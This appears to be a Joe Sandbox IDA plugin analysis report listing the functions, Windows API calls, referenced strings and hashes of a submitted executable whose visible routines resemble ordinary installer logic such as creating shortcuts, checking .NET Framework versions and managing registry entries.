                                                                          • Instruction ID: 9e854467c286a28b18f31183f63f6c048648830cb6dea2264be82148a8da808a
                                                                          • Opcode Fuzzy Hash: 2927a2be40f20d1df61f9808da4568e2b654a5b12de7d33a12a957fb8f1fb446
                                                                          • Instruction Fuzzy Hash: DC419D71E40619AFDF10EAE9D846FAFB7B8EF08704F104466B614FB281D67969408BA4
                                                                          APIs
                                                                            • Part of subcall function 0042C7D0: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7F4
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471CA0
                                                                          • SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471D9F
                                                                          • SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471DB5
                                                                          • SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471DDA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
                                                                          • String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
                                                                          • API String ID: 971782779-3668018701
                                                                          • Opcode ID: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                          • Instruction ID: db08b3a78c5346aa08fc53deac37c7c900aaeab2e7ee66e1d047288e3336f214
                                                                          • Opcode Fuzzy Hash: 0d3410c3bdf89c1015e05b6172e76740a58f53e74cadef7db015f49446f40693
                                                                          • Instruction Fuzzy Hash: 55D11374A00149AFDB11EFA9D882BDDB7F5AF48304F50806AF804B7391D778AE45CB69
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,?,00000000,?,00000000,00454029,?,0045A28A,00000003,00000000,00000000,00454060), ref: 00453EA9
                                                                            • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                          • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F2D
                                                                          • RegQueryValueExA.ADVAPI32(0045A28A,00000000,00000000,00000000,?,00000004,00000000,00453F73,?,0045A28A,00000000,00000000,?,00000000,?,00000000), ref: 00453F5C
                                                                          Strings
                                                                          • RegOpenKeyEx, xrefs: 00453E2C
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453E00
                                                                          • , xrefs: 00453E1A
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453DC7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$FormatMessageOpen
                                                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2812809588-1577016196
                                                                          • Opcode ID: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                          • Instruction ID: 0c0f272a557b88975729148cb7875cb844f630b1a696a545db65abb6b51d3efb
                                                                          • Opcode Fuzzy Hash: b1af26e04a1ddbd00b5096240104ccc8619789e15be67a0962b146e22416e1b8
                                                                          • Instruction Fuzzy Hash: 9D912271E04208ABDB11DF95D942BDEB7F8EB48745F10406BF901FB282D6789E09CB69
                                                                          APIs
                                                                            • Part of subcall function 00458A84: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,00458BC1,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458AD1
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C1F
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458C89
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,00458D79,?,00000000,00000000,00000000), ref: 00458CF0
                                                                          Strings
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00458CA3
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00458C3C
                                                                          • v2.0.50727, xrefs: 00458C7B
                                                                          • SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 00458BD2
                                                                          • v1.1.4322, xrefs: 00458CE2
                                                                          • .NET Framework version %s not found, xrefs: 00458D29
                                                                          • .NET Framework not found, xrefs: 00458D3D
                                                                          • v4.0.30319, xrefs: 00458C11
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Open
                                                                          • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
                                                                          • API String ID: 2976201327-446240816
                                                                          • Opcode ID: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                          • Instruction ID: 32352305a0336a12336774107b7ff5a8d04594bb7e4f1119dbb0a5d8803071dd
                                                                          • Opcode Fuzzy Hash: 8254d5a6b390bed499ba7934cf142a416bdfe1caafdbe3dddb40a3d3832c2c59
                                                                          • Instruction Fuzzy Hash: 7351D430A041485BCB00DB65C861BEE77B6DB99305F14447FE941EB393DF399A0E8B69
                                                                          APIs
                                                                          • CloseHandle.KERNEL32(?), ref: 0045819B
                                                                          • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 004581B7
                                                                          • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 004581C5
                                                                          • GetExitCodeProcess.KERNEL32(?), ref: 004581D6
                                                                          • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0045821D
                                                                          • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00458239
                                                                          Strings
                                                                          • Helper process exited, but failed to get exit code., xrefs: 0045820F
                                                                          • Helper process exited., xrefs: 004581E5
                                                                          • Helper isn't responding; killing it., xrefs: 004581A7
                                                                          • Stopping 64-bit helper process. (PID: %u), xrefs: 0045818D
                                                                          • Helper process exited with failure code: 0x%x, xrefs: 00458203
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                          • API String ID: 3355656108-1243109208
                                                                          • Opcode ID: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                          • Instruction ID: ca0659a1f7dd3987533feb970b51f52a81168d3092bf9212e29b303cc353bad7
                                                                          • Opcode Fuzzy Hash: 9811c6cb40db8456fd5d766f3d0adf9b5719f814c8999e39bf7c18c375c74eaf
                                                                          • Instruction Fuzzy Hash: 79217170604B409AD720E7B9C44574B7AD49F49305F048C6FF99AEB293DE78E8488B2A
                                                                          APIs
                                                                            • Part of subcall function 0042DD0C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453B6B
                                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00453C1B,?,00000000,00453CDF), ref: 00453CA7
                                                                            • Part of subcall function 0042E73C: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AB3
                                                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453A83
                                                                          • RegCreateKeyEx, xrefs: 00453ADF
                                                                          • , xrefs: 00453ACD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateFormatMessageQueryValue
                                                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                          • API String ID: 2481121983-1280779767
                                                                          • Opcode ID: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                          • Instruction ID: 9af730bdb9cddd4578bad4c79146292dd217fd331dbe672fdf24ed7127d9b52a
                                                                          • Opcode Fuzzy Hash: 44ad0baa8eea8450781b5e4082410cae7738b89c9e6c0941fad1624c81a85519
                                                                          • Instruction Fuzzy Hash: 89811076A00209AFDB01DFD5C941BDEB7B9EF48345F50442AF900F7282D778AE498B69
                                                                          APIs
                                                                            • Part of subcall function 00452F1C: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045300B
                                                                            • Part of subcall function 00452F1C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,}RI,$pI,?,00000000,00453056), ref: 0045301B
                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00495129
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,0049527D), ref: 0049514A
                                                                          • CreateWindowExA.USER32(00000000,STATIC,0049528C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 00495171
                                                                          • SetWindowLongA.USER32(?,000000FC,00494904), ref: 00495184
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC,0049528C), ref: 004951B4
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00495228
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000), ref: 00495234
                                                                            • Part of subcall function 0045326C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                          • 73A15CF0.USER32(?,00495257,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00495250,?,?,000000FC,00494904,00000000,STATIC), ref: 0049524A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                          • API String ID: 170458502-2312673372
                                                                          • Opcode ID: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                          • Instruction ID: 9b82285d6c0ab0379da714a391ea46bab388e10fbcdfaad342ba26a277b4da99
                                                                          • Opcode Fuzzy Hash: f6557b622499f81c9b2921459e78cb07cf2f20039233d61e3ba364b89272a642
                                                                          • Instruction Fuzzy Hash: 8D416670A40608AFDF01EBA5DC52F9E7BF8EB09704F6045B6F500F7291D7799A008BA8
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E369
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E36F
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E445,?,00000000,0047CC14,00000000), ref: 0042E3BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressCloseHandleModuleProc
                                                                          • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll$mVE
                                                                          • API String ID: 4190037839-37397897
                                                                          • Opcode ID: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                          • Instruction ID: 8a20d89f11a8313c83dbe49676a31c52bde0b33a6882556ea6b203ed52161f1a
                                                                          • Opcode Fuzzy Hash: 37e56631d33ffb8b797cbe9838f91edbc85ff6c3b76c647076f124bfd1bc8c2e
                                                                          • Instruction Fuzzy Hash: 0C212570B00219AFDF10EBA7DC45A9F77A8EB44314F904477A500E7292EB7C9A05CB59
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 00462124
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 00462138
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462145
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462152
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0046219E
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 004621DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                          • Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
                                                                          • Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                          • Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042F008
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0042F082
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                          • Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
                                                                          • Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                          • Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
                                                                          • CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
                                                                          • SysFreeString.OLEAUT32(?), ref: 00455C47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInstance$FreeString
                                                                          • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
                                                                          • API String ID: 308859552-2052886881
                                                                          • Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                          • Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
                                                                          • Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                          • Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59
                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02333858,00000000), ref: 00458399
                                                                          • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
                                                                          • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
                                                                          • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004584B0,?,00000000), ref: 00458475
                                                                          • GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02333858,?,00000000,004584B0,?,00000000), ref: 0045847C
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                          • String ID: CreateEvent$TransactNamedPipe
                                                                          • API String ID: 2182916169-3012584893
                                                                          • Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                          • Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
                                                                          • Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                          • Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
                                                                          • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
                                                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                          • API String ID: 1914119943-2711329623
                                                                          • Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                          • Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
                                                                          • Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
